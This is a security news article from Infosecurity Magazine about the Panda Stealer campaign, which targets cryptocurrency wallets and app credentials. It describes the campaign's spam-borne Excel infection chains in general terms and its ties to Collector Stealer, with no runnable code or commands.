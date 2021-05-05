Infosecurity Group Websites
Latest
News

Panda Stealer Targets Crypto Wallets

A new information stealer is going after cryptocurrency wallets and credentials for applications including NordVPN, Telegram, Discord, and Steam.

Panda Stealer uses spam emails and the same hard-to-detect fileless distribution method deployed by a recent Phobos ransomware campaign discovered by Morphisec.

The attack campaign appears to be primarily targeting users in Australia, Germany, Japan, and the United States.

Panda Stealer was discovered by Trend Micro at the start of April. Threat researchers have identified two infection chains being used by the campaign.

They said: "In one, an .XLSM attachment contains macros that download a loader. Then, the loader downloads and executes the main stealer. 

"The other infection chain involves an attached .XLS file containing an Excel formula that utilizes a PowerShell command to access paste.ee, a Pastebin alternative, that accesses a second encrypted PowerShell command."

Once installed, Panda Stealer can collect details like private keys and records of past transactions from its victim’s various digital currency wallets, including Dash, Bytecoin, Litecoin, and Ethereum.

Other cards up Panda's sleeve are the ability to take screenshots of the infected computer and the power to exfiltrate data from browsers, like cookies, passwords, and cards.

Researchers linked the campaign to an IP address assigned to a virtual private server rented from Shock Hosting. Shock Hosting said that the server assigned to this address has been suspended. 

Panda Stealer was determined to be a variant of Collector Stealer, cracked by Russian threat actor NCP, also known as su1c1de. 

"Because the cracked Collector Stealer builder is openly accessible online, cybercriminal groups and script kiddies alike can use it to create their own customized version of the stealer and C&C panel," noted researchers.

While the two stealers behave similarly, they have different command and control server URLs, build tags, and execution folders.

CTO Michael Gorelik, who heads the threat intelligence team for Morphisec, has seen the number of infostealers shoot up since the Emotet network was disrupted.

When analyzing the different types of attacks Morphisec detected across seven million enterprise endpoints over the last 12 months, Gorelik found that infostealers made up the highest percentage of attempted endpoint attacks (31%). 

Related to This Story

What’s Hot on Infosecurity Magazine?

1
News

Third Parties Caused Data Breaches at 51% of Organizations

2
News

Scripps Health Knocked Offline by Ransomware

3
News

Global Phishing Campaign Drops New Malware Trio

4
News

Virgin Active SA Suffers Cyber-Attack

5
News

Online Child Abuse Platform with 400k Users Taken Down

6
News

US Mulling Domestic Spying Partnership with Private Companies

1
News

Homecoming Queen Hacker to be Tried as an Adult

2
News

Panda Stealer Targets Crypto Wallets

3
News

Poor Working Relationships Between Security and Networking Teams Preventing Benefits of Digital Transformation

4
News

Cyber-Attack on Belgian Parliament

5
Blog

Time for Infosec Professionals’ Imaginations to Stretch to Outer Space

6
News

Misconfigs and Unpatched Bugs Top Cloud Native Security Incidents

1
Webinar

How to Win Cybersecurity Budget and Buy-in from the C-Suite to Mitigate Increased Level of Threat

2
Webinar

Supply Chain Security: Easing the Headache of Third-Party Risk Assessments

3
Webinar

Evolution of Ransomware-as-a-Service and Malware Delivery Mechanisms

4
Webinar

How To Navigate the Critical Intersection Between Data Security and Data Privacy

5
Webinar

PKI in Today's Cybersecurity Landscape: What, Why and How

6
Webinar

Data Classification: The Foundation of Effective Cybersecurity

1
Online Summit

[On-Demand] Infosecurity Magazine Spring Online Summit - EMEA 2021

2
Webinar

Security Mythbusting: Dismantling the Top Five API Myths

3
Online Summit

[On-Demand] Infosecurity Magazine Spring Online Summit - North America 2021

4
News Feature

Census 2021: How Safe Will Our Data Be Over the Next 100 Years?

5
Opinion

How Behavioral Biometrics is Combating Credential Stuffing Attacks

6
Webinar

Securing the #COVID19 Vaccine & Supply Chain